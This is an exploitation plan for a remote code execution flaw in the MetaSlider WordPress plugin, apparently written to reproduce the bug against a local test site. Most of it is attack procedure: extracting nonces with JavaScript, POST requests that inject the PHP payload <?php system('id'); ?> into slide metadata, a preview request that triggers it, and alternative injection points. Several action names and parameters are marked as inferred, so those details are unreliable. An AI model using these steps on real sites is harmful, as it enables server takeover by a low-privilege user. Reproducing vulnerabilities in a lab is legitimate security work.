Research Plan: CVE-2026-39465 - MetaSlider Authenticated RCE

1. Vulnerability Summary

CVE-2026-39465 is a Remote Code Execution (RCE) vulnerability in the MetaSlider plugin (<= 3.106.0) affecting the ml-slider component. The vulnerability exists due to improper sanitization and control of slide metadata, specifically the "markup" or "template" fields used in certain slide types like Post Feed or External slides. An attacker with Editor-level permissions can inject PHP code into these metadata fields. When the slideshow is rendered (e.g., in a preview or on a public page), the plugin processes this markup on the server, leading to code execution.

2. Attack Vector Analysis

• Endpoint: wp-admin/admin-ajax.php (AJAX) or the REST API /wp-json/metaslider/v1/.
• Action: ms_save_slides (inferred for saving slide meta) or create_image_slide.
• Vulnerable Parameter: slides[ID][meta][ml-slider_markup] or similar metadata keys associated with slide rendering.
• Authentication: Authenticated, Editor or higher.
• Preconditions: The attacker must be able to create or edit a slideshow.

3. Code Flow

1. Entry Point (Client): The Slideshow.vue component calls this.saveSlides(slides) which sends an AJAX/REST request to save slide data.
2. Entry Point (Server): The server-side handler for slide saving (e.g., MetaSlider_Slide->save_data()) receives the meta array.
3. Data Persistence: The malicious payload <?php system('id'); ?> is saved into the wp_postmeta table for the specific slide (post type ml-slide).
4. Execution Trigger: When an Editor clicks "Preview" (action=metaslider_preview) or a page with the slider is viewed, the MetaSlider_Slideshow->render() method is called.
5. Sink: For Post Feed slides, the plugin retrieves the ml-slider_markup meta value and processes it. If the rendering engine uses eval() or an insecure template implementation, the PHP code is executed.

4. Nonce Acquisition Strategy

The admin/assets/dist/js/admin.js file indicates several nonces are localized into the metaslider global object.

Extraction Steps:

1. Login as an Editor.
2. Navigate to the MetaSlider dashboard: wp-admin/admin.php?page=metaslider.
3. Execute JavaScript to extract the nonces:

   // Primary nonces for slide operations
   const nonces = {
       create: window.metaslider?.create_slide_nonce,
       update: window.metaslider?.update_slide_image_nonce,
       duplicate: window.metaslider?.duplicate_slide_nonce,
       save: window.metaslider?.save_nonce // Inferred key for saving settings/slides
   };
   return nonces;
   

4. If the specific save_nonce is missing, the create_slide_nonce is often used for broad slide management in this plugin.

5. Exploitation Strategy

Step 1: Create a Base Slideshow

Create a slideshow and an initial image slide to obtain necessary IDs.

• Request:
  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Body (URL-encoded):
    • action: create_image_slide
    • slider_id: `` (empty for new slider)
    • selection[]: [ATTACHMENT_ID] (Must have an image ID from Media Library)
    • _wpnonce: [create_slide_nonce]

Step 2: Extract IDs

The response will contain the slider_id and the slide_id.

• Expected Response: {"success": true, "data": [{"slide_id": 123, "html": "..."}]}

Step 3: Inject RCE Payload

Modify the slide to a "Post Feed" type and inject the PHP payload into the markup.

• Request:
  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Body (URL-encoded):
    • action: ms_save_slides (or metaslider_save_slides)
    • _wpnonce: [save_nonce]
    • slides[123][meta][ml-slider_type]: post_feed
    • slides[123][meta][ml-slider_markup]: <?php system('id'); die; ?>

Step 4: Trigger Execution

Request the preview of the slider to trigger the server-side rendering of the malicious markup.

• Request:
  • URL: http://localhost:8080/wp-admin/admin-ajax.php?action=metaslider_preview&id=[SLIDER_ID]
  • Method: GET

6. Test Data Setup

1. Create Editor User: wp user create attacker attacker@example.com --role=editor --user_pass=password
2. Upload Image: wp media import /path/to/test-image.jpg (needed for create_image_slide).
3. Identify Attachment ID: Note the ID of the uploaded image (e.g., 5).

7. Expected Results

A successful exploit will result in the GET request to metaslider_preview returning the output of the id command (e.g., uid=33(www-data) ...).

8. Verification Steps

1. Check Meta: Verify the payload was saved:
   wp post meta get [SLIDE_ID] ml-slider_markup
2. Process List: Check for any suspicious processes spawned during the preview request.

9. Alternative Approaches

If ms_save_slides fails:

• REST API Path: Use POST /wp-json/metaslider/v1/slides/save with the same payload structure.
• External Slide Type: Try ml-slider_type=external and look for a content or url field that might be evaluated.
• Slider Settings: Target the settings[html] or settings[custom_css] fields in action=ms_save_settings. MetaSlider sometimes processes CSS through a server-side parser that might be vulnerable.